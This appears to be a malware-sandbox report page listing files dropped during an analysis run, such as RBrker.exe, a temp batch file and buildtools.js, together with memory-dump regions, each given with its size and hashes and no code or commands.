974189167136e3077eb014232bca6b449b079dbb86aa6dca6443c5765f59a5a46c89f31dc7d0c7e0b3b9620866a9240c84dcb7d6f0ce53090eb6ee1b5cbab717

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
1a6ddfa543c440a859a51adf665365fa

SHA1
4becb8a63efceace76207572984b7e340c28fc54

SHA256
41803f3dbca5bbea6f8987d64e9375d5a231917682e6668aeaae540d61ab4fb2

SHA512
d372138ba0f46f5bf0cd720efc69ab1d50c047b9edefdde59471b14ae1360c91e381374cc6f6d53fa10614a012cdee4bd8fc45b8e7f7a00fb135fba0190f9a84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2b5631c2923d86fc9a026dd9cfe44187

SHA1
bea53b84a25af630b61436269947d635050faffd

SHA256
3cf795c0745b1f062b1f4da926c6dbfb9e74d61e49f63ca142bb343cf2941ba5

SHA512
808099a48f70c2dff24dc05098285c8d4de2bceb3d8521dfb5258dfd0430f42eec5cd2d02eb4268a7db2a07518efcdbaea5e5f402dc1afb9feb826c56893669b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6fab1e187ad4914b81eb556f57680330

SHA1
4c2e5c80c9193bdc108dd44042e5c1de3723129c

SHA256
c64a8d84b6a4c3b87766cac00b313c473fd10af79b88340a0ebe36e273e92ec2

SHA512
1eb837c2f0521aa8703b5a0a6238de3851ca4e36842d853672a6d8fb4c76c62b443ee757265612d3464d733e6c635a51b5a42f8b17a6c106119fa2e8d5478919

Download Submit
C:\Users\Admin\AppData\Local\Temp\RBrker.exe

Filesize
47KB

MD5
ee9bd2b3d64511b880fcbd8ad23c71fa

SHA1
8c2cc8c959621c4543c9aa111367adb77f1ec697

SHA256
040ef285cdbca1ab4b3ceaeac8f0ace87aca7d2147123a1359f27a3039b0b700

SHA512
47c90a3a2093796a8b324fd76f92bc6f5a3975272f88305352d3e9c4fcd543f2c2421d7ed0d95e9df0cda33e6fb58b2a10c3a400bdeb6c1cb4912d50970623ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cw22rdhe.011.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE659.tmp.bat

Filesize
160B

MD5
545767c55eed247ab32fab4ada992cd6

SHA1
b60523405d39d3f24a0c50ceb16141a6c718b649

SHA256
00ecd01181a2220ae8b4a56be3d6ad9bdcf52a24486905fc90c877b494b26d59

SHA512
541b5b529492575af4d1902c19e38e664e823189d65239ea66c442285cac07aecaa96154a5a96bcfda493ea66bcf3557d2986f4230af33f8faf25166246e14a2

Download Submit
C:\Windows\Temp\buildtools.js

Filesize
1KB

MD5
1cad2cafba69dfd93fd369cac5d7f332

SHA1
1d5b120a9cf6c14c6539bb482c0d31eb39a59216

SHA256
e91cb124ad396e993ce57407e3759efd9c4a577c5c6c0bcdf7c26a5bbe58a861

SHA512
fb422bb50bc318b505e53cb3db6009b6a665e09dd259b9f7c086f9137838136e1e5724cbaed92d6adb018523a3196f873f331b9dd5b0fcf2f253c85d491703e1

Download Submit
memory/4412-104-0x000001D6EFE80000-0x000001D6EFEA2000-memory.dmp

Filesize
136KB

Download
memory/4688-361-0x0000000000E00000-0x0000000000E12000-memory.dmp

Filesize
72KB

Download
memory/4688-457-0x00000000057C0000-0x0000000005826000-memory.dmp

Filesize
408KB

Download
memory/4688-458-0x0000000005C50000-0x0000000005CEC000-memory.dmp

Filesize
624KB

Download